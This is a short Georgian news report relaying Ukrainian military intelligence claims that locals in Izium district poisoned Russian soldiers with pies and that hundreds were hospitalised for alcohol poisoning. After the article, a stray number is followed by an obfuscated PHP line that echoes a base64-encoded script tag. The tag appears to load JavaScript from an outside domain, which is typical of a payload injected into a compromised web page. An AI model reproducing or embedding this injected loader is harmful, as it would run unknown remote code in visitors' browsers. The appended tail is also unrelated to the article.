celsiusi
ავერსი შნაიდერი
უკრაინის თავდაცვის სამინისტროს მთავარი სადაზვერვო სამმართველოს ინფორმაციით, ხარკოვის ოლქის იზიუმის რაიონში ადგილობრივები რუს ჯარისკაცებს მოწამლული ნამცხვრებით და ღვეზელით „გაუმასპინძლდნენ“. 
 
ამასთან, უკრაინული შეიარაღებული ძალების მიერ ვრცელდება ინფორმაცია იმის შესახებ, რომ ასეულობით ოკუპანტი ალკოჰოლური ინტოქსიკაციით საავადმყოფოშია გადაყვანილი.
 
მათივე ინფორმაციით, უკრაინელები ოკუპანტებს ყველა შესაძლო საშუალებებით ეწინააღმდეგებიან. არსებული ინფორმაციით, იზიუმის რაიონის (ხარკოვის ოლქი) ადგილობრივი მცხოვრებლები რუსეთის ფედერაციის მე-3 მოტომსროლელი დივიზიის ჯარისკაცებს მოწამლული ღვეზელებით „გაუმასპინძლდნენ“. შედეგად, ორი მათგანი მაშინვე გარდაიცვალა, კიდევ 28 იმყოფება რეანიმაციაში. მათი ამჟამინდელი სტატუსი ზუსტდება.
 
„რუსეთის ფედერაციის მე-3 მოტომსროლელი დივიზიის კიდევ 500-მდე სამხედრო მოსამსახურე გაურკვეველი წარმოშობის მძიმე ალკოჰოლური სასმლით მოწამვლის შედეგად საავადმყოფოებში იმყოფება. რუსეთის სარდლობა ამ შემთხვევებს ე.წ. „არასაბრძოლო დანაკარგებად“ აღწერს“, - ნათქვამია უკრაინის თავდაცვის სამინისტროს მთავარი სადაზვერვო სამმართველოს განცხადებაში.
818
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");